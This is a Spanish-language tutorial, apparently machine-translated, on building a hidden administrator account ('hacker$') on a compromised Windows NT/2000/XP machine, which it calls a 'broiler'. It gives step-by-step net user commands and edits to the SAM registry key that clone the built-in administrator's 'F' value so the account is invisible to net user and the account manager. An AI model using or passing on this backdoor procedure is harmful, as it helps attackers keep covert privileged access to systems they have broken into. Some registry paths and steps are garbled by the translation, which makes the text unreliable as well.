Cree un superusuario oculto para Windows

Creo que todos están familiarizados con regedit.exe, pero no pueden establecer permisos en la clave de registro. La mayor ventaja de regedt32.exe es la capacidad de configurar la clave de registro. Permisos. La información de la cuenta de nt /2000 /xp está bajo la clave HKEY_LOCAL_MACHINESAMSAM del registro, pero otros usuarios, excepto el SISTEMA del usuario del sistema, no tienen derecho a ver la información interna, por lo que primero uso el regedt32.exe para configurar la clave SAM para mí y " Control total y permisos. Esto leerá y escribirá la información en la clave SAM. Los pasos específicos son los siguientes:

1. Supongamos que iniciamos sesión en el broiler con el servicio de terminal como administrador de superusuario. Primero cree una cuenta en la línea de comandos o en el administrador de cuentas: hacker $, aquí Cree esta cuenta bajo la línea de comando hacker del usuario neto $ 1234 /add

2. En el inicio /ejecución, escriba: regedt32.exe y presione Entrar para ejecutar regedt32.exe.

3, punto " permisos " aparecerá una ventana emergente para agregar la cuenta cuando inicie sesión en la barra de seguridad, aquí estoy registrado como administrador, así que agregaré administrador, y Establezca los permisos en " Control total ". Aquí debe explicar: es mejor agregar la cuenta en la que inició sesión o el grupo donde se ubica la cuenta, y no modificar la cuenta o el grupo original, de lo contrario, se presentarán una serie de problemas innecesarios. Si oculta al superusuario, puede eliminar la cuenta que agregó aquí.

4, luego haga clic en " Inicio " → " Ejecutar " e ingrese " regedit.exe " Escriba para iniciar el editor de registro regedit.exe. Abra la clave: HKEY_LOCAL_MAICHINESAMSAMDomainsaccountusernameshacker $ "

5. Exporte los elementos hacker $, 00000409 y 000001F4 a hacker.reg, 409.reg, 1f4.reg, y edite estos archivos exportados con Notepad. Copie el valor de la clave "F" debajo del elemento 000001F4 del superusuario y anule el valor de la clave "F" debajo del elemento 00000409 del hacker $, y luego combine 00000409.reg con el hacker.reg.

6. Ejecute net user hacker $ /del en la línea de comandos para eliminar hacker $: net user hacker $ /del

7. Presione F5 en la ventana regedit.exe para actualizar. Luego presione el archivo: importe el archivo de registro e importe el hacker.reg modificado en el registro.

8. En este punto, se construyó el superusuario oculto $ hacker, y luego se cerró regedit.exe. En la ventana regedt32.exe, cambie el permiso de la clave HKEY_LOCAL_MACHINESAMSAM de nuevo al estado original (solo elimine el administrador de cuenta agregado).

9, Nota: Una vez que se crea el superusuario oculto, el usuario en el administrador de la cuenta no puede ver al hacker $, y la línea de comandos no se puede ver con el comando <quo; net user " pero después de que se establece el superusuario , no puede volver a cambiar la contraseña, si usa el comando net user para cambiar la contraseña del hacker $, el superusuario oculto será visto en el administrador de cuentas y no podrá eliminarse.